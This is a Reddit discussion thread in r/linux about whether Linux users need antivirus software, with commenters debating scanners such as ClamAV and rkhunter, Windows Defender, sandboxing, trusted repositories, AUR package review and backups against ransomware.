Let's talk about antivirus for linux
Posted by 0ajs0jas@reddit | linux | View on Reddit | 56 comments
As a lot of us have already seen (in this post https://www.reddit.com/r/linux4noobs/comments/1op33pa/ransomware_help/). Linux adoption is on the rise. We used to be told not to care for viruses because hackers just don't care but here we are. So what are you guys using as antivirus measures?
Kamdman@reddit
So I see a lot of pros and cons. Is there a decent anti malware out there that is worth concedering? This is for someone who knows very little about linux and will be using it for email, browsing the web, and some office apps.
Nelo999@reddit
Well, there is chkroorkit, rkhunter, linux malware detect as well as clam av.
All of them are terminal based and are mostly malware scanners.
It is good to have those of course, but as long as you only download software from the official repositories and do not click on random links you are on a very good place.
cgoldberg@reddit
The common methods most commercial AV products use offer very little protection for the types of exploits and attacks users should actually worry about. So security posture and practices are very important for Linux users, but adopting a similar shitshow of AV snakeoil products that many Windows are accustomed to is definitely not the answer.
AnsibleAnswers@reddit
This is a very old canard that doesn't seem informed by modern antivirus, which typically uses both signature and behavior-based detection today. Windows Defender is actually quite sophisticated, with MsMpEng.exe doing a lot of the detection by opening files in an isolated environment to see what they actually do.
cgoldberg@reddit
Windows Defender is forced by organization. It is the single most annoying thing on my system. It devours system resources and causes me to reboot just to stop its scans and allow my system to be useable again. Meanwhile, it has never found any valid malware or vulnerabilities.
AnsibleAnswers@reddit
Tell me you don’t know how to use task scheduler some more…
This is besides the point, though. Modern antivirus for windows is a lot more sophisticated than you’re assuming.
cgoldberg@reddit
Knowing how to use task scheduler doesn't stop scans forced by a group security policy that I can't disable.
I consider most Windows AV products to be malware themselves that cause more problems than they solve (regardless of sophistication). I'm glad similar software isn't popular on Linux.
AnsibleAnswers@reddit
My major point is that 1. you're wrong on a specific point and 2. we actually need to have a sound plan for Linux security if we don't want these resource-heavy solutions. Blaming users for being stupid won't cut it.
Modern linux is already insecure in an enterprise environment without EDR.
Nelo999@reddit
Modern Linux is significantly more secure than Windows, even without EDR lol.
Although servers should absolutely be running antivirus software, no questions about it.
cgoldberg@reddit
Of course security is important. My point was replicating ineffective solutions from Windows isn't a solution.
Nelo999@reddit
Windows Defender is apparently "sophisticated", yet Windows users still get infected with malware left and right?
Windows Defender is not very good, one still has to pay for third party antivirus software if they want better protection on Windows.
And many people still do.
cgoldberg@reddit
Windows Defender is forced by organization. It is the single most annoying thing on my system. It devours system resources and causes me to reboot just to stop its scans and allow my system to be useable again. Meanwhile, it has never found any valid malware or vulnerabilities.
Zaphods-Distraction@reddit
It's called installing software from trusted repos/sources. If you go with blind faith on third party repos, then that's a PEBKAC problem, not a Linux problem.
Frodojj@reddit
Nobody is perfect.Even some maintainers were compromised. Even the distributions themselves aren’t immune. Sometimes the websites for the distros were compromised too. Unwittingly downloading malware from a trusted source that was compromised without your knowledge is definitely possible. That is indeed a Linux problem. …and a Windows problem. …and a Mac OS problem. It’s a problem with any OS. Writing it off as “stupid users” is not a good solution.
Nelo999@reddit
No OS is really immune to malware, but when 83% to 95% of all malware targets Windows, it is significantly a Windows problem more than a Linux one.
Frodojj@reddit
Security isn’t a bragging right; using lax measures will make malware getting into your system much more likely no matter the OS.
dddurd@reddit
I think official repository incidents are different kind of issues here. The impact might be the same. Afaik such things didn't happen with Mac/windows update servers. Educating users (exactly the same thing as calling them stupid) can go very far.
shroddy@reddit
This so much!!! Closing our eyes and pretending malware can't hurt us, as long as we are "not stupid" no longer cuts it. I personally don't think antivirus is the right answer and I am more in the "we need a sandbox" camp, but malware on Linux won't go away, no matter how much we wish it would.
Frodojj@reddit
Thank you. I also think sandboxing via firejail or using access control via selinux or apparmor is good for workstation users. But scanning still has a place (in addition to sandboxing/access control) when setting up servers such as email or file sharing.
Zaphods-Distraction@reddit
Look, I know shit can happen even when you do everything the right way, but that's also why you have a backup scheme: NAS, encrypted cloud, detached archival storage for files that really, really matter.
Frodojj@reddit
Backup is not a substitute for security. Malware can steal passwords or personal information.
Zaphods-Distraction@reddit
I'm talking about ransomware here specifically
Frodojj@reddit
The OP didn’t seem limited to ransomware. Ransomware isn’t the only kind of malware. Ransomware can also have multiple payloads that still does the other things. So I don’t think that changes anything.
AnsibleAnswers@reddit
The issue is PEBKAC problems need to be accounted for. They can’t just be dismissed from a security standpoint. Humans use operating systems, and humans are not always careful.
Vulpes_99@reddit
I had to google PEBKAC and found out it's a term in Brazil, with a literal translation 😂
We old timers technicians also used to call it a "BIOS Problem", BIOS meaning "Bicho Ignorante Operando o Sistema" (Ignorant Animal Operating the System) 🤣
Inevitable_Type_419@reddit
I like referring to it as a layer 8 issue, some end users have been one privy to the PBKAC acronyms meaning 😅
Vulpes_99@reddit
As in the OSI layers? That's quite the specific one 😂
Inevitable_Type_419@reddit
Yizzer! It works great because everyone in IT [sans the L1 who refuses to learn the basics including OSI] gets the reference, but if an end user overhears they won't catch on 😅
Vulpes_99@reddit
That's so evil that I can't help but loving it 😂
DavidJohnMcCann@reddit
Install software from official repositories. Do not use Arch AUR or Ubuntu PPAs, although SlackBuilds are safe. If your distro doesn't have the stuff you need, then either you need a different one or you should compile from source. That policy has kept me safe for 25 years.
natermer@reddit
Antivirus would NOT have stopped that.
It wouldn't of stopped that in Linux and it wouldn't of stopped that in Windows.
Upstairs-Comb1631@reddit
That's a bit of a problem, because only paid products exist as comfortable antiviruses.
NGRhodes@reddit
That case doesn’t show Linux needs antivirus. People unpacked the freerdp3 packages. There were no scripts, no payloads, nothing hidden. More likely, the user ran something else and wiped the system before anyone could trace it.
That’s not a Linux issue. It’s a lapse in basic user security habits, running unverified code, trusting unknown commands, no isolation or rollback. Attackers count on that. Social engineering is still the main attack vector, and no antivirus can protect against misplaced trust.
githman@reddit
To quote an adorable piece from a certain internet archive's FAQ:
In Linux, you are your own antivirus; it's been discussed repeatedly over decades. Furthermore, Linux world is too disparate, inconsistent and fast-changing in many mutually incompatible directions at once to make copying the Windows anti-malware approach feasible.
What could a Linux antivirus technically rely upon?
If you have a potentially working approach to suggest, feel free to revolutionize the industry and likely become a trillionaire. Modern Linux market is vast.
AuDHDMDD@reddit
common sense+adblock+proper firewall+proper dns
Jumpy-Dig5503@reddit
AUR? Oof. Lotta malware has been found there. We need to start taking this seriously. Our security is losing its obscurity.
Inevitable_Taro4191@reddit
Read the package build, see what it does. It's your responsibility as an Arch user to properly check what you install.
I know people often use Aur helpers, and some of them just install stuff without checking.
It's not too hard, and you quickly get used to it and learn something. You basically check what sources it is pulling from, you verify that source, you skim thru it and see if it looks ok.
dddurd@reddit
Depending on the amount it can be tedious on upgrade. You always review on upgrade? I use Gentoo which is kind everything aur but reviewed, but and I personally don't review at all.
nply@reddit
The PKGBUILDS rarely change substantially on updates. Usually only the version number and hash do. Looking at the diffs it's easy to spot red flags like a changed source URL or added install scripts.
I only give PKGBUILDS a closer look on first install and make sure the source is what I'm expecting. After that it just takes a few seconds to glance over the diffs.
AuDHDMDD@reddit
minimal and smart air as well. I bundled packages and aur
Recipe-Jaded@reddit
There aren't many instances of malware on the AUR, especially not for packages people actually install.
Ice_Hill_Penguin@reddit
Antimalwares shall execute you. Cheers! (your wines)
formegadriverscustom@reddit
I've been using PCs for 35+ years. Personally, I've never used an "antivirus" or feel the need to install one, not even when I was on DOS/Windows.
"Antivirus" are a rather poor substitute for common sense and experience. On other people's machines, I've often seen "antivirus" repeatedly interfere with legitimate programs and consume massive amounts of resources. For most people lacking common sense, some kind of ad blocker will be much, much more effective and efficient than any "antivirus" will ever be.
I'll say "antivirus" are, at best, not much more useful than placebo, and at worst a much bigger problem than the things they supposedly protect you from.
dddurd@reddit
Looks like it came from some deb repository but the analysis disagrees. OP must've extracted or executed random stuff. For now you can still trust the official repos, it's not like flathub.
iheartrms@reddit
I don't see viruses as a problem for Linux. It just works differently. Configure fapolicyd if you are particularly concerned.
Business_Reindeer910@reddit
nothing
whosdr@reddit
One thing I tried is setting up an encrypted filesystem as a file, mounted in a separate namespace to run things like web browsers and social apps. The idea being that any application I run on my system otherwise won't be able to access these.
That's intended to protect against session theft malware.
I hit some roadblocks and haven't picked up my efforts again yet. But it looks like it should be doable.
Ok_Instruction_3789@reddit
I don't use any antivirus. But I just don't download anything that I don't trust either lol.
WeedlnlBeer@reddit
if linux gains popularity, anti-malware companies will take notice.
JagerAntlerite7@reddit
sudo apt-get install ...from distro and trusted repos? Sure.Anything else? Maybe an AppImage or two. I feel safe enough.
p0358@reddit
With btrfs or something, snapshots can easily protect you against the effects of ransomware
quigongene@reddit
If I grab something sketchy off the internet, I run it through Virus Total first.
airmantharp@reddit
Me, when my wife asks me to install something...
aue_sum@reddit
SELinux + Flatpak + perhaps immutable distros
Isacx123@reddit
Common Sense 2025, pretty good antivirus, also works on Windows.
Don't run random executables from unknown sources, this advice applies to all operating systems.
DFS_0019287@reddit
No AV for me.